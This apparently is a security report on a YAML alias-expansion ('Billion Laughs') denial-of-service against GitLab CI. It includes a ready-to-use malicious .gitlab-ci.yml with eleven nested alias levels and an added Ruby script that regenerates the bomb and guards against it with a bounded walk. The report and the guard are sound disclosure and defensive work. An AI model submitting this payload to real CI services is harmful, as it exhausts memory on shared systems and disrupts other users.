Billion Laughs attack
GitLab CI is (probably) vulnerable to the Billion Laughs attack. It is a denial-of-service attack: a small YAML document defines an anchor and then a chain of anchored sequences, each of which aliases the previous one several times, so that resolving the aliases into a copy (or walking, transforming or serializing the parsed document) expands to an exponentially large structure. It might affect everything that parses our .gitlab-ci.yml files.
Exploit
Use this file as the repository's .gitlab-ci.yml (each level aliases the previous one nine times, so .k expands to 9^11 leaves):
# level 0: nine literal commands
.a: &a [echo "lol",echo "lol",echo "lol",echo "lol",echo "lol",echo "lol",echo "lol",echo "lol",echo "lol"]
# every further level references the previous one nine times
.b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
.c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
.d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
.e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
.f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
.g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
.h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
.i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
.j: &j [*i,*i,*i,*i,*i,*i,*i,*i,*i]
.k: &k [*j,*j,*j,*j,*j,*j,*j,*j,*j]
# a job that pulls the whole chain in through the merge key
bomb:
  <<: *k
Proof
I tried it locally, and the memory of one of the Ruby processes quickly began to increase quite dramatically. I stopped it before the machine froze.
Impact
- Everything that parses .gitlab-ci.yml on our side might be affected.
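The reproduction and a guard for it, as an added example in Ruby (the language of GitLab and of its YAML parser, Psych); this is not the reporter's code and not GitLab's own loader. It builds the bomb from the report programmatically (each level aliasing the previous one, with the top-level alias placed under a job `script:` key instead of the merge key), parses it with `YAML.safe_load(aliases: true)` as a CI loader that supports anchors must, and contrasts two views of the result: the object graph Psych actually builds, where every alias is a reference to one shared Array, is tiny, whereas anything that walks the structure following aliases (a deep copy, a deep key transform, a serializer) sees 9**11 leaves. The guard is a bounded walk that counts nodes and depth the way such a copy would and aborts at the first limit exceeded; the limits, function names and the `script:` placement are this example's assumptions, not GitLab's.

```ruby
# Added example, not GitLab's code: reproduce the alias bomb from the report,
# show why Psych itself survives it (aliases share one object), and apply a
# bounded node-count / depth check that rejects it before any deep copy or
# key transform can expand the aliases. Limits and names are illustrative.
require 'yaml'
require 'set'

LEAF = 'echo "lol"'

# Build the bomb programmatically. Level 0 holds `fanout` literal commands;
# every later level references the previous one `fanout` times, so the last
# level expands to fanout**levels leaves (9**11 for the report's file).
# The top alias is placed under a realistic job key, `script` (assumption).
def bomb_yaml(levels: 11, fanout: 9)
  names = ('a'..'z').first(levels)
  lines = names.each_with_index.map do |name, i|
    items = i.zero? ? Array.new(fanout, LEAF) : Array.new(fanout, "*#{names[i - 1]}")
    ".#{name}: &#{name} [#{items.join(',')}]"
  end
  lines << 'bomb:' << "  script: *#{names.last}"
  lines.join("\n") + "\n"
end

# .gitlab-ci.yml legitimately uses anchors, so aliases must stay enabled;
# that is exactly why the alias bomb is parsed instead of being rejected.
def load_ci_yaml(yaml)
  YAML.safe_load(yaml, aliases: true)
end

# Count the objects Psych actually built, visiting each object once.
# This is the cheap view: the whole bomb is a few dozen shared objects.
def distinct_nodes(obj, seen = Set.new)
  return 0 unless seen.add?(obj.object_id)
  case obj
  when Hash  then 1 + obj.sum { |k, v| distinct_nodes(k, seen) + distinct_nodes(v, seen) }
  when Array then 1 + obj.sum { |v| distinct_nodes(v, seen) }
  else 1
  end
end

class DeepSizeExceeded < StandardError; end

# Count nodes the way a deep copy, a deep key transform or a serializer would
# see them: every alias reference is walked again. Stop at the first bound
# hit, so the bomb costs at most max_nodes steps instead of 9**11. The depth
# bound also stops the self-referential variant (`.j: &j [*j, ...]`), which
# Psych turns into a cyclic Array that an unbounded walk would never finish.
def check_deep_size!(obj, max_nodes:, max_depth:)
  count = 0
  walk = lambda do |node, depth|
    count += 1
    raise DeepSizeExceeded, "more than #{max_nodes} nodes" if count > max_nodes
    raise DeepSizeExceeded, "nested deeper than #{max_depth}" if depth > max_depth
    case node
    when Hash  then node.each { |k, v| walk.(k, depth + 1); walk.(v, depth + 1) }
    when Array then node.each { |v| walk.(v, depth + 1) }
    end
  end
  walk.(obj, 0)
  count
end

# Load, then refuse the document before anything downstream expands it.
# The limits are example values, not GitLab's.
def load_ci_yaml_bounded(yaml, max_nodes: 100_000, max_depth: 100)
  obj = load_ci_yaml(yaml)
  check_deep_size!(obj, max_nodes: max_nodes, max_depth: max_depth)
  obj
end

if __FILE__ == $PROGRAM_NAME
  small = load_ci_yaml(bomb_yaml(levels: 3))
  puts "3 levels: #{distinct_nodes(small)} shared objects, " \
       "#{check_deep_size!(small, max_nodes: 1_000_000, max_depth: 100)} nodes when expanded"
  big = load_ci_yaml(bomb_yaml) # parses in milliseconds: nothing is expanded yet
  puts "11 levels: #{distinct_nodes(big)} shared objects"
  begin
    load_ci_yaml_bounded(bomb_yaml)
  rescue DeepSizeExceeded => e
    puts "11 levels rejected: #{e.message}"
  end
end
```

Run it as a script: the three-level version reports fewer than twenty shared objects against 1748 expanded nodes, and the full eleven-level bomb still parses instantly but is rejected by the bounded walk after at most 100_000 steps, long before `.k` is reached. The design point is that the check must follow aliases (a memoised walk would report the bomb as harmless) while refusing to finish the expansion it is measuring, which is why it counts with an early abort rather than building anything.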